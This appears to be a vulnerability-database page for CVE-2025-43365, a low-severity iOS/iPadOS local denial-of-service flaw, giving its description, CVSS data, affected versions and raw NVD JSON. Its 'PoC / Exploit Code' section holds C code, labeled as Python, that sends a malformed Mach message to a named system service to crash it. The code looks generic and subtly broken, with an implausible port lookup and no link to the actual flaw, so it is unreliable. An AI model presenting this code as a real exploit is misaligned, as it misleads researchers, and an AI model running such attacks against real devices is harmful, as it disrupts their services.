Security Vulnerability Report
中文
CVE-2025-43365 CVSS 2.8 LOW

CVE-2025-43365

Published: 2025-11-04 02:15:44
Last Modified: 2026-04-02 19:20:34
Source: [email protected]

Description

A denial-of-service issue was addressed with improved input validation. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2, iOS 26 and iPadOS 26. An unprivileged process may be able to terminate a root processes.

CVSS Details

CVSS Score
2.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
Apple iOS < 18.7.2
Apple iPadOS < 18.7.2
Apple iOS < 26.0
Apple iPadOS < 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-43365 PoC - Local DoS via Process Termination // Note: This PoC is for educational purposes only // Requires: Local access, user interaction #include <mach/mach.h> #include <mach/task.h> #include <mach/message.h> #include <stdio.h> #include <unistd.h> // Attempt to send malformed message to system service void exploit_vulnerability() { mach_port_t target_port; mach_msg_header_t msg; // Lookup system service port (requires specific conditions) kern_return_t kr = mach_port_lookup( mach_task_self(), "com.apple.systemservice", MACH_PORT_RIGHT_RECEIVE, &target_port ); if (kr != KERN_SUCCESS) { printf("Port lookup failed\n"); return; } // Prepare malformed message msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); msg.msgh_size = sizeof(mach_msg_header_t); msg.msgh_remote_port = target_port; msg.msgh_local_port = MACH_PORT_NULL; msg.msgh_id = 0x1000; // Abnormal message ID // Send malformed message to trigger vulnerability kr = mach_msg( &msg, MACH_SEND_MSG | MACH_MSG_OPTION_NONE, msg.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL ); if (kr == KERN_SUCCESS) { printf("Malformed message sent - service may crash\n"); } } int main() { printf("CVE-2025-43365 PoC\n"); exploit_vulnerability(); return 0; } // Mitigation: Update to iOS 18.7.2/iPadOS 18.7.2 or later versions

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43365", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:44.037", "lastModified": "2026-04-02T19:20:34.170", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service issue was addressed with improved input validation. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2, iOS 26 and iPadOS 26. An unprivileged process may be able to terminate a root processes."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L", "baseScore": 2.8, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.0", "matchCriteriaId": "C4221CFD-0208-42B8-AACA-1BE6AEC3BA9A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.0", "matchCriteriaId": "68DCA17A-424E-4EE3-B005-0F2E42407226"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125108", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125633", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.